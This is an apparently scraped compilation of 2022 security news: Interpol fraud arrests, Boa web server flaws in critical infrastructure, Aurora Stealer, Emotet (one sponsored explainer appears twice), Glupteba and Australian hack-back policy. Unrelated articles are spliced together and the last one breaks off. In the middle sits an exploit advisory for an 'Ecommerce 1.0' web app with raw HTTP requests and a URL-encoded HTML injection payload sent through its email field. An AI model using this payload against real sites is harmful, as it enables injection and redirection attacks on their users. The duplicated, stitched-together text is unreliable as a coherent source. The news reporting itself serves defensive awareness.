A worldwide operation aimed at curtailing fraud has led to the arrest of 975 suspects and the seizure of nearly $130 million, as Interpol expands its efforts and brings new tools to its investigations.

A wide-ranging international operation by law enforcement agencies in 30 countries aiming to prosecute online fraudsters has resulted in nearly a thousand arrests and a net of $130 million in seized virtual assets.

Interpol's National Central Bureaus (NCBs) collaborated with local authorities to pursue arrests. Interpol announced that the linked investigations, dubbed Operation Haechi III, tracked cyber-enabled financial crimes and money laundering in 30 countries. The investigations, which took place between June 28 and Nov. 23, intercepted money transfers and virtual assets, leading to the arrest of 975 suspects in the last five months.

The ability to recover funds quickly will cut into cybercriminal profits, an important deterrence, says Ed Cabrera, chief cybersecurity officer at endpoint security firm Trend Micro.

“Illicit financial transactions are the lifeline of all cyber-enabled crimes," he says. "Having the capability to quickly track, seize and return illicit funds to their victims not only can it make victims whole, but it is an incredibly disruptive tool for law enforcement."

The effectiveness of the effort highlights the need for cross-border collaboration, Hyung Se Lee, the head of Interpol's National Central Bureau in Seoul, said in a statement announcing the operation.

"As we look to the future, we recognize the importance for decisive and concerted law enforcement action across borders," he said, noting that the ongoing operation shows the international community's "dedicated coordination and the strong commitment of participating countries."

The operation is the latest Interpol effort to pursue fraudsters and the money trails that they leave behind. In June, the international law enforcement agency announced the arrest of 2,000 suspects and the seizure of more than $50 million stolen by fraudsters using a variety of social engineering schemes. The previous month, Interpol arrested the suspected head of a massive business email compromise (BEC) gang, who had fled arrest in 2021.

A year ago, Interpol announced the arrests of 1,003 people and the seizure of $27 million during Operation Haechi II, the second program in a three-year initiative aimed at curtailing specific types of online fraud, such as online financial crime trends, impersonation scams, romance frauds, sextortion, and investment fraud.

"Online scams like those leveraging malicious apps evolve as quickly as the cultural trends they opportunistically exploit," José De Gracia, assistant director of criminal networks at Interpol, said in a statement at the time. "Sharing information on emerging threats is vital to the ability of police to protect the victims of online financial crime. It also lets police know that no country is alone in this fight."  

**Encrypted Messaging, Massive Ponzi Schemes**

The wide range of fraud fraudsters pursued by Interpol included two Red Notice fugitives accused of stealing $29 million in a Ponzi scheme affecting South Korea, cybercriminals in India impersonating Interpol officers to defraud victims, and fraudsters that stole more than $1.2 million from victims in Ireland, according to the announcement. A Red Notice is an international request for local authorities to arrest a suspect.

Many of the cybercriminal groups exchanged information and cryptocurrency over encrypted chat messaging applications, the investigation found. 

Among the countries that cooperated in the Haechi III operation are Australia, France, Hong Kong (China), India, Indonesia, Ireland, Japan, Korea, Kyrgyzstan, Laos, Philippines, Poland, Singapore, Spain, Thailand, the United Arab Emirates, the United Kingdom, and the United States.

Interpol, along with Afripol, also announced an Africa-centric effort — the Africa Cyber Surge Operation — involving 27 countries collaborating over the past four months. The efforts resulted in the takedown of a dark market in Eritrea, investigations into cryptocurrency scams in Cameroon, and the arrest of the operators of malicious cyber infrastructure used for botnets, phishing campaigns, and online extortion.

In addition to national government, Interpol credited private-sector partners with helping out, including British Telecom, the Cyber Defense Institute, Fortinet’s FortiGuard Labs, Group-IB, Kaspersky, Palo Alto Networks' Unit 42 team, Shadowserver, and Trend Micro.

**New Tools for Interpol**

As part of its fight against cybercriminals and their financial pipelines, Interpol announced a new tool last year known as the Anti-Money Laundering Rapid Response Protocol (ARRP), which establishes a procedure for quickly stopping criminals' theft of funds — and reversing transactions — before they have completed.

Under ARRP, cooperation channels between Interpol bureaus can be used to freeze the transfer of funds and intercept money before it makes its way into criminals' accounts. Often all, or the vast majority of, funds can be completely recovered.

"Intercepting the illicit proceeds of online financial crimes before they disappear into the pockets of money mules is a race against time," Jorge Luis Vargas Valencia, director general of the Colombian National Police, stated in last year's announcement, noting that "the high level of complexity of coordination with law enforcement units and banking institutions on the other side of the world" has traditionally made such efforts difficult.

Global Cyber-Enforcement Op Nets $130M, Says Interpol

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.
Why is everyone scared of Emotet?
Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication.

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.

**Why is everyone scared of Emotet?**

Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns.

The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory.

It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware.

The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The Emotet team constantly changes its tactics, techniques, and procedures to ensure that the existing detection rules cannot be applied. As part of its strategy to stay invisible in the infected system, the malicious software downloads extra payloads using multiple steps.

And the results of Emotet behavior are devastating for cybersecurity specialists: the malware is nearly impossible to remove. It spreads quickly, generates faulty indicators, and adapts according to attackers' needs.

**How has Emotet upgraded over the years?**

Emotet is an advanced and constantly changing modular botnet. The malware started its journey as a simple banking trojan in 2014. But since then, it has acquired a bunch of different features, modules, and campaigns:

*   2014\. Money transfer, mail spam, DDoS, and address book stealing modules.
*   2015\. Evasion functionality.
*   2016\. Mail spam, RIG 4.0 exploit kit, delivery of other trojans.
*   2017\. A spreader and address book stealer module.
*   2021\. XLS malicious templates, uses MSHTA, dropped by Cobalt Strike.
*   2022\. Some features remained the same, but this year also brought several updates.

This tendency proves that Emotet isn't going anywhere despite frequent "vacations" and even the official shutdown. The malware evolves fast and adapts to everything.

**What features has a new Emotet 2022 version acquired?**

After almost half a year of a break, the Emotet botnet returned even stronger. Here is what you need to know about a new 2022 version:

*   It drops IcedID, a modular banking trojan.
*   The malware loads XMRig, a miner that steals wallet data.
*   The trojan has binary changes.
*   Emotet bypasses detection using a 64-bit code base.
*   A new version uses new commands:

Invoke rundll32.exe with a random named DLL and the export PluginInit

*   Emotet's goal is to get credentials from Google Chrome and other browsers.
*   It's also targeted to make use of the SMB protocol to collect company data
*   Like six months ago, the botnet uses XLS malicious lures, but it adopted a new one this time:

The Emotet's Excel lure

**How to detect Emotet?**

The main Emotet challenge is to detect it in the system quickly and accurately. Besides that, a malware analyst should understand the botnet's behavior to prevent future attacks and avoid possible losses.

With its long story of development, Emotet stepped up in the anti-evasion strategy. Through the evolution of the process execution chain and malware activity inside the infected system changes, the malware has modified detection techniques drastically.

For example, in 2018, it was possible to detect this banker by looking at the name of the process – it was one of these:

> eventswrap, implrandom, turnedavatar, soundser, archivesymbol, wabmetagen, msrasteps, secmsi, crsdcard, narrowpurchase, smxsel, watchvsgd, mfidlisvc, searchatsd, lpiograd, noticesman, appxmware, sansidaho

Later, in the first quarter of 2020, Emotet started to create specific key into the registry - it writes into the key HKEY\_CURRENT\_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER value with the length 8 symbols (letters and characters).

Of course, Suricata rules always identify this malware, but detection systems often continue beyond the first wave because rules need to update.

Another way to detect this banker was its malicious documents - crooks use specific templates and lures, even with grammatical errors in them. One of the most reliable ways to detect Emotet is by the YARA rules.

To overcome malware's anti-evasion techniques and capture the botnet – use a malware sandbox as the most convenient tool for this goal. In ANY.RUN, you can not only detect, monitor, and analyze malicious objects but also get already extracted configurations from the sample.

There are some features that you use just for Emotet analysis:

*   reveal C2 links of a malicious sample with the FakeNet
*   use Suricata and YARA rulesets to successfully identify the botnet
*   Get data about C2 servers, keys, and strings extracted from the sample's memory dump
*   gather fresh malware's IOCs

The tool helps to perform successful investigations quickly and precisely, so malware analysts can save valuable time.

ANY.RUN sandbox has prepared incredible deals for **Black Friday 2022**! Now is the best time to boost your malware analysis and save some money! Check out special offers for their premium plans but for a limited time – from 22-29 November, 2022.

Emotet has not demonstrated full functionality and consistent follow-on payload delivery. Use modern tools like ANY.RUN online malware sandbox to improve your cybersecurity and detect this botnet effectively. Stay safe and good threat hunting!

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

All You Need to Know About Emotet in 2022

For 6 months, the infamous Emotet botnet has shown almost no activity, and now it's distributing malicious spam. Let's dive into details and discuss all you need to know about the notorious malware to combat it.

**Why is everyone scared of Emotet?**

Emotet is by far one of the most dangerous trojans ever created. The malware became a very destructive program as it grew in scale and sophistication. The victim can be anyone from corporate to private users exposed to spam email campaigns.

The botnet distributes through phishing containing malicious Excel or Word documents. When users open these documents and enable macros, the Emotet DLL downloads and then loads into memory.

It searches for email addresses and steals them for spam campaigns. Moreover, the botnet drops additional payloads, such as Cobalt Strike or other attacks that lead to ransomware.

The polymorphic nature of Emotet, along with the many modules it includes, makes the malware challenging to identify. The Emotet team constantly changes its tactics, techniques, and procedures to ensure that the existing detection rules cannot be applied. As part of its strategy to stay invisible in the infected system, the malicious software downloads extra payloads using multiple steps.

And the results of Emotet behavior are devastating for cybersecurity specialists: the malware is nearly impossible to remove. It spreads quickly, generates faulty indicators, and adapts according to attackers' needs.

**How has Emotet upgraded over the years?**

Emotet is an advanced and constantly changing modular botnet. The malware started its journey as a simple banking trojan in 2014. But since then, it has acquired a bunch of different features, modules, and campaigns:

*   2014\. Money transfer, mail spam, DDoS, and address book stealing modules.
*   2015\. Evasion functionality.
*   2016\. Mail spam, RIG 4.0 exploit kit, delivery of other trojans.
*   2017\. A spreader and address book stealer module.
*   2021\. XLS malicious templates, uses MSHTA, dropped by Cobalt Strike.
*   2022\. Some features remained the same, but this year also brought several updates.

This tendency proves that Emotet isn't going anywhere despite frequent "vacations" and even the official shutdown. The malware evolves fast and adapts to everything.

**What features has a new Emotet 2022 version acquired?**

After almost half a year of a break, the Emotet botnet returned even stronger. Here is what you need to know about a new 2022 version:

*   It drops IcedID, a modular banking trojan.
*   The malware loads XMRig, a miner that steals wallet data.
*   The trojan has binary changes.
*   Emotet bypasses detection using a 64-bit code base.
*   A new version uses new commands:

Invoke rundll32.exe with a random named DLL and the export PluginInit

*   Emotet's goal is to get credentials from Google Chrome and other browsers.
*   It's also targeted to make use of the SMB protocol to collect company data
*   Like six months ago, the botnet uses XLS malicious lures, but it adopted a new one this time:

The Emotet's Excel lure

**How to detect Emotet?**

The main Emotet challenge is to detect it in the system quickly and accurately. Besides that, a malware analyst should understand the botnet's behavior to prevent future attacks and avoid possible losses.

With its long story of development, Emotet stepped up in the anti-evasion strategy. Through the evolution of the process execution chain and malware activity inside the infected system changes, the malware has modified detection techniques drastically.

For example, in 2018, it was possible to detect this banker by looking at the name of the process – it was one of these:

> eventswrap, implrandom, turnedavatar, soundser, archivesymbol, wabmetagen, msrasteps, secmsi, crsdcard, narrowpurchase, smxsel, watchvsgd, mfidlisvc, searchatsd, lpiograd, noticesman, appxmware, sansidaho

Later, in the first quarter of 2020, Emotet started to create specific key into the registry - it writes into the key HKEY\_CURRENT\_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER value with the length 8 symbols (letters and characters).

Of course, Suricata rules always identify this malware, but detection systems often continue beyond the first wave because rules need to update.

Another way to detect this banker was its malicious documents - crooks use specific templates and lures, even with grammatical errors in them. One of the most reliable ways to detect Emotet is by the YARA rules.

To overcome malware's anti-evasion techniques and capture the botnet – use a malware sandbox as the most convenient tool for this goal. In ANY.RUN, you can not only detect, monitor, and analyze malicious objects but also get already extracted configurations from the sample.

There are some features that you use just for Emotet analysis:

*   reveal C2 links of a malicious sample with the FakeNet
*   use Suricata and YARA rulesets to successfully identify the botnet
*   Get data about C2 servers, keys, and strings extracted from the sample's memory dump
*   gather fresh malware's IOCs

The tool helps to perform successful investigations quickly and precisely, so malware analysts can save valuable time.

ANY.RUN sandbox has prepared incredible deals for **Black Friday 2022**! Now is the best time to boost your malware analysis and save some money! Check out special offers for their premium plans but for a limited time – from 22-29 November, 2022.

Emotet has not demonstrated full functionality and consistent follow-on payload delivery. Use modern tools like ANY.RUN online malware sandbox to improve your cybersecurity and detect this botnet effectively. Stay safe and good threat hunting!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Ecommerce version 1.0 suffers from cross site scripting and open redirection vulnerabilities.

    ## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials - JavaScript Injection## Author: nu11secur1ty## Date: 11.23.2022## Vendor: https://github.com/winston-dsouza## Software: https://github.com/winston-dsouza/ecommerce-website## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website## Description:The value of the eMail request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The attacker can trick the users of this system, very easy to visit avery dangerous link from anywhere, and then the game will over forthese customers.Also, the attacker can create a network from botnet computers by usingthis vulnerability.## STATUS: HIGH Vulnerability[+] Exploit00:```POSTPOST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.comHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Description01:JavaScript can be injected into the application response (a vulnerableapp - signup_script.php, no sanitizing submit function).The attacker can crash the MySQL server by sending large bites of POSTrequests to the MySQL server of this system.## STATUS: HIGH Vulnerability - CRITICAL## Real attack:[+] Exploit01:```POSTPOST /ecommerce/signup_script.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2fOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/ecommerce/index.phpContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 1070eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)## Proof and Exploit:[href](https://streamable.com/3r4t36)## Real Exploit:[href](https://streamable.com/n3b5ev)## Real Exploit - code insert:[href](https://streamable.com/64dmo2)## Time spent`1:45`

Ecommerce 1.0 Cross Site Scripting / Open Redirect

Chinese threat actors have already used the vulnerable and pervasive Boa server to infiltrate the electrical grid in India, in spate of malicious incidents.

Microsoft this week identified a gaping attack vector for disabling industrial control systems (ICS), which is unfortunately pervasive throughout critical infrastructure networks: the Boa Web server.

The computing giant has identified vulnerabilities in the server as the initial access point for successful attacks on the Indian energy sector earlier this year, carried out by Chinese hackers. But here's the kicker: It's a Web server that's been discontinued since 2005.

It may seem strange that a nearly 20-year-old end-of-life server is still hanging around, but Boa is included in a range of popular software developer kits (SDKs) that Internet of Things device developers use in their design of critical components for ICS, according to Microsoft. As such, it's still used across myriad IoT devices to access settings, management consoles, and sign-in screens for devices on industrial networks — which leaves critical infrastructure vulnerable to attack on a large scale.

These include SDKs released by RealTek that are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters, researchers noted.

In April, Recorded Future reported on attacks on the Indian power sector that researchers attributed to a Chinese threat actor tracked as RedEcho. The activity targeted organizations responsible for carrying out real-time operations for grid control and electricity dispatch within several northern Indian states, and it occurred throughout the year.

It turns out that the vulnerable component in the attacks was the Boa Web server. According to a Microsoft Security Threat Intelligence blog post published Nov. 22, the Web servers and the vulnerabilities they represent in the IoT component supply chain are often unbeknownst to developers and administrators who manage the system and its various devices. In fact, admins often don't realize that updates and patches aren't addressing the Boa server, the researchers said.

"Without developers managing the Boa Web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files," researchers wrote in the post.

**Making the Discovery**

It took some digging to identify that the Boa servers were the ultimate culprit in the Indian energy-sector attacks, the researchers said. First they noticed that the servers were running on the IP addresses on the list of indicators of compromise (IoCs) published by Recorded Future at the time of the release of the initial report last April, and also that the electrical grid attack targeted exposed IoT devices running Boa, they said.

Moreover, half of the IP addresses returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool that Recorded Future identified was used in the attack, the researchers noted.

Further investigation of the headers indicated that more than 10% of all active IP addresses returning the headers were related to critical industries — including the petroleum industry and associated fleet services — with many of the IP addresses assigned to IoT devices with unpatched critical vulnerabilities. This highlighted "an accessible attack vector for malware operators," according to Microsoft.

The final clue was that most of the suspicious HTTP response headers that researchers observed were returned over a short time frame of several days, which linked them to likely intrusion and malicious activity on networks, they said.

**Gaping Security Vulnerabilities in the Supply Chain**

It's no secret that the Boa Web server is full of holes — notably including arbitrary file access (CVE-2017-9833) and information disclosure (CVE-2021-33558) — that are unpatched and need no authentication to exploit, the researchers said.

"These vulnerabilities may allow attackers to execute code remotely after gaining device access by reading the 'passwd' file from the device or accessing sensitive URIs in the Web server to extract a user's credentials," they wrote.

"Critical vulnerabilities such as CVE-2021-35395, which affected the digital administration of devices using RealTek's SDK, and CVE-2022-27255, a zero-click overflow vulnerability, reportedly affect millions of devices globally and allow attackers to launch code, compromise devices, deploy botnets, and move laterally on networks," they said.

While patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities — factors that also make the existence of Boa Web servers in ICS ripe for exploitation, researchers added.

**Current Threat Activity and Mitigation**

Microsoft's research indicates that Chinese attackers have successfully targeted Boa servers as recently as late October, when the Hive threat group claimed a ransomware attack on Tata Power in India. And in their continued tracking of the activity, researchers continued to see attackers attempting to exploit Boa vulnerabilities, "indicating that it is still targeted as an attack vector" and will continue to be one as long as these servers are in use.

For this reason, it's crucial for ICS network administrators to identify when the vulnerable Boa servers are in use and to patch vulnerabilities wherever possible, as well as take other actions to mitigate risk from future attacks, researchers said.

Specific steps that can be taken include using device discovery and classification to identify devices with vulnerable components by enabling vulnerability assessments that identify unpatched devices in the network and set workflows for initiating appropriate patch processes with solutions.

Administrators also should extend vulnerability and risk detection beyond the firewall to identify Internet-exposed infrastructure running Boa Web server components, researchers said. They also can reduce the attack surface by eliminating unnecessary Internet connections to IoT devices in the network, as well as applying the practice of isolating with firewalls all IoT and critical-device networks.

Other actions to consider for mitigation include using proactive antivirus scanning to identify malicious payloads on devices; configuring detection rules to identify malicious activity whenever possible; and adopting a comprehensive IoT and OT solution to monitor devices, respond to threats, and increase visibility to detect and alert when IoT devices with Boa are used as an entry point to a network.

Microsoft: Popular IoT SDKs Leave Critical Infrastructure Wide Open to Cyberattack

A nascent Go-based malware known as Aurora Stealer is being increasingly deployed as part of campaigns designed to steal sensitive information from compromised hosts.
"These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake

A nascent Go-based malware known as Aurora Stealer is being increasingly deployed as part of campaigns designed to steal sensitive information from compromised hosts.

"These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake cracked software download websites," cybersecurity firm SEKOIA said.

First advertised on Russian cybercrime forums in April 2022, Aurora was offered as a commodity malware for other threat actors, describing it as a "multi-purpose botnet with stealing, downloading and remote access capabilities."

In the intervening months, the malware has been scaled down to a stealer that can harvest files of interest, data from 40 cryptocurrency wallets, and applications like Telegram.

Aurora also comes with a loader that can deploy a next-stage payloading using a PowerShell command.

The cybersecurity company said at least different cybercrime groups, called traffers, who are responsible for redirecting user's traffic to malicious content operated by other actors, have added Aurora to their toolset, either exclusively or alongside RedLine and Raccoon.

"Aurora is another infostealer targeting data from browsers, cryptocurrency wallets, local systems, and acting as a loader," SEKOIA said. "Sold at a high price on market places, collected data is of particular interest to cybercriminals, allowing them to carry out follow-up lucrative campaigns, including Big Game Hunting operations."

The development also comes as researchers from Palo Alto Networks Unit 42 detailed an enhanced version of another stealer called Typhon Stealer.

The new variant, dubbed Typhon Reborn, is designed to steal from cryptocurrency wallets, web browsers, and other system data, while removing previously existing features like keylogging and cryptocurrency mining in a likely attempt to minimize detection.

"Typhon Stealer provided threat actors with an easy to use, configurable builder for hire," Unit 42 researchers Riley Porter and Uday Pratap Singh said.

"Typhon Reborn's new anti-analysis techniques are evolving along industry lines, becoming more effective in the evasion tactics while broadening their toolset for stealing victim data."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Warn of Cyber Criminals Using Go-based Aurora Stealer Malware

The notorious Emotet malware has returned with renewed vigor as part of a high-volume malspam campaign designed to drop payloads like IcedID and Bumblebee.
"Hundreds of thousands of emails per day" have been sent since early November 2022, enterprise security company Proofpoint said last week, adding, "the new activity suggests Emotet is returning to its full functionality acting as a delivery

The notorious Emotet malware has returned with renewed vigor as part of a high-volume malspam campaign designed to drop payloads like IcedID and Bumblebee.

"Hundreds of thousands of emails per day" have been sent since early November 2022, enterprise security company Proofpoint said last week, adding, "the new activity suggests Emotet is returning to its full functionality acting as a delivery network for major malware families."

Among the primary countries targeted are the U.S., the U.K., Japan, Germany, Italy, France, Spain, Mexico, and Brazil.

The Emotet-related activity was last observed in July 2022, although sporadic infections have been reported since then. In mid-October, ESET revealed that Emotet may be readying for a new wave of attacks, pointing out updates to its "systeminfo" module.

The malware, which is attributed to a threat actor known as Mummy Spider (aka Gold Crestwood or TA542), staged a revival of sorts late last year after its infrastructure was dismantled during a coordinated law enforcement operation in January 2021.

Europol called Emotet the "world's most dangerous malware" for its ability to act as a "primary door opener for computer systems" to deploy next-stage binaries that facilitate data theft and ransomware. It started off in 2014 as a banking trojan before evolving into a botnet.

Infection chains involving the malware are known to employ generic lures as well as the technique of email thread hijacking to lure recipients into opening macro-enabled Excel attachments.

"Following Microsoft's recent announcement that it would begin disabling macros by default in Office documents downloaded from the internet, many malware families have begun migrating away from Office macros to other delivery mechanisms like ISO and LNK files," Cisco Talos said earlier this month.

"Therefore, it is interesting to note that this new campaign of Emotet is using its old method of distributing malicious Microsoft Office documents (maldocs) via email-based phishing.

An alternative method urges potential victims to copy the file to a Microsoft Office Template location – a trusted location – and launch the lure document from there instead of having to explicitly enable macros to activate the kill-chain.

The renewed activity has also been accompanied by changes to the Emotet loader component, and addition of new commands, and updates to the packer to resist reverse engineering.

One of the follow-on payloads distributed through Emotet is a brand new variant of the IcedID loader, which receives commands to read and send file contents to a remote server, in addition to executing other backdoor instructions that allow it to extract web browser data.

The use of IcedID is concerning as it's likely a precursor for ransomware, the researchers pointed out. Another malware dropped via Emotet is Bumblebee, according to Palo Alto Networks Unit 42.

"Overall, these modifications made to the client indicate the developers are trying to deter researchers and reduce the number of fake or captive bots that exist within the botnet," researchers Pim Trouerbach and Axel F said.

"Emotet has not demonstrated full functionality and consistent follow-on payload delivery (that's not Cobalt Strike) since 2021, when it was observed distributing The Trick and Qbot."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Notorious Emotet Malware Returns With High-Volume Malspam Campaign

Google has won a lawsuit filed against two Russian nationals in connection with the operation of a botnet called Glupteba, the company said last week.
The U.S. District Court for the Southern District of New York imposed monetary sanctions against the defendants and their U.S.-based legal counsel. The defendants have also been asked to pay Google's attorney fees. The defendants' move to press

Google has won a lawsuit filed against two Russian nationals in connection with the operation of a botnet called **Glupteba**, the company said last week.

The U.S. District Court for the Southern District of New York imposed monetary sanctions against the defendants and their U.S.-based legal counsel. The defendants have also been asked to pay Google's attorney fees. The defendants' move to press sanctions against Google was denied.

The development comes nearly a year after the tech giant took down the malware's command-and-control infrastructure and initiated legal proceedings against **Dmitry Starovikov** and **Alexander Filippov**, who are said to have been in charge of running the illegal botnet.

The defendants, along with 15 others, have also been accused of using the malware to create a hacked network of devices to mine cryptocurrencies, harvest victims' personal and financial data, and place disruptive ads.

Gluteba is distinguished from its botnet counterparts by the use of cryptocurrency blockchains as a command-and-control mechanism to withstand disruption. Per Google, the botnet approximately infected more than one million Windows computers worldwide.

"The Glupteba malware \[...\] instructs infected computers to look for the addresses of its C2 servers by referencing transactions associated with specific accounts on the Bitcoin blockchain," the court order reads.

Starovikov and Filippov, who claim to have worked for a company called Valtron LLC as software engineers, have been charged with attempting to wilfully mislead the court, while also acting with an intent to deprive Google of discoverable information.

A settlement demand made on September 8 shows that the actors asked $1 million each from Google, in addition to $110,000 in attorney's fees, in exchange for providing the private keys for Bitcoin addresses associated with the Glupteba botnet.

The Mountain View-based company, however, rejected the offer, calling it "extortionate," and reported it to law enforcement.

But in a contradictory statement, the defendants walked back on their earlier stance a week later on September 15, asserting that "they had no such information in their possession, and that the Bitcoin accounts were owned by Valtron's CEO."

"It is now clear that the defendants appeared in this Court not to proceed in good faith to defend against Google's claims but with the intent to abuse the court system and discovery rules to reap a profit from Google," District Judge Denise L. Cote said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Wins Lawsuit Against Russians Linked to Blockchain-based Glupteba Botnet

How far can its government — or any government or private company — go to proactively disrupt cyber threats without causing collateral damage?

The Australian government's defiant proclamation recently that it would hack back against hackers that sought to target organizations in the country represents a break from the usual cautious manner in which nations have approached international cyber threats.

How effective the country's newly announced "joint standing operation against cybercriminal syndicates" will be remains an open question, as does the issue of whether other nations will follow suit. Also unclear is how far exactly law enforcement is willing to go to neutralize infrastructure that it perceives as being used in cyberattacks against Australian entities.

**Pressure for Hack-Back Legislation May Be Mounting**

"As it becomes more obvious that the majority of organizations are poorly prepared to defend themselves, I think it is justifiable for well-resourced governments to step in," says Richard Stiennon, chief research analyst at IT-Harvest. "I fully expect hack-back legislation to pass in response to some devastating attack that is visible to lots of voters. But I do not expect it to have teeth or change the landscape much."

Australian prime minister Anthony Albanese's government on Nov. 12 announced a joint initiative between the Australian Federal Police and the Australian Signals Directorate to "investigate, target and disrupt cybercriminal syndicates with a priority on ransomware threat groups."

The government launched the initiative following two major cyberattacks — one on telecommunications company Optus and the other on health insurer Medibank — that together exposed personally identifiable information (PII) and other sensitive information belonging to more than one-third of Australia's total population of some 26 million people.

The cyberattacks were among the largest in scope in the country's history and sparked considerable outrage and concern, especially after attackers began publicly leaking medical records (including abortion records) following Medibank's refusal to pay a demanded $10 million ransom. Some security researchers have pinned the blame for the ransomware attack on Medibank on Russia's notorious REvil threat group.

The Australian counter-hacking operation will prioritize cyber threats perceived as presenting the greatest threat to national interests. It will focus on intelligence gathering, identifying cybercrime ring leaders and networks, so law enforcement can intercept and disrupt operations and actors regardless of where they are operating from. Media outlets including the _Guardian_ quoted Australian home affairs minister Clare O'Neil promising to "day in, day out hunt down the scumbags" responsible for the recent attacks.

"The smartest and toughest people in our country are going to hack the hackers," the Guardian quoted O'Neil as saying.

**An Ongoing Practice**

The strong language notwithstanding, it's unclear how far exactly the Australian government will go — or can go — beyond what is already being done to disrupt cyber threats, especially those originating from outside its jurisdiction. Law enforcement and intelligence agencies in several countries, including the US, UK, and Australia itself, routinely are engaged in the kind of intelligence gathering and tracking down of cybercriminals that the Australian government said it would carry out under the new initiative.

"It is my belief that the U.S. has been taking action in the cyber-domain since at 2010 when US Cyber Command was stood up," Stiennon says. "Other countries like the Netherlands and Israel have also demonstrated their abilities to strike back at sophisticated attackers."

